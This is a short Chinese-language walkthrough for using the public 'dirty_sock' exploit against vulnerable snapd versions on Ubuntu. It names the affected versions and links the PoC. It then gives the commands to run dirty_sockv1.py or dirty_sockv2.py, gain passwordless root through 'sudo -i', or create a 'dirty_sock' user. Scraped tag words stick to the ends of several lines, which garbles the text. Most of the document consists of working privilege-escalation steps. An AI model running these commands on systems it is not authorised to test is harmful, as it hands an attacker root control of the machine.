Ubuntu 版本:python
Ubuntu 18.10git
Ubuntu 18.04 LTSgithub
Ubuntu 16.04 LTSubuntu
Ubuntu 14.04 LTSbash
2.28 < snapd < 2.37 会存在该漏洞ssh
Poc Github:https://github.com/initstring/dirty_sock网站
ssh-keygen -t rsa -C "your_email@example.com"
查看公钥spa
将公钥复制到网站上3d
接下来执行 pocblog
python3 ./dirty_sockv1.py -u "sch01ar@163.com" -k "../.ssh/id_rsa"
接着切换为 root 用户
sudo -i
切换成 root 用户时不须要输入密码
直接运行脚本
python3 dirty_sockv2.py
执行完会生成一个 dirty_sock 的用户,密码也是这个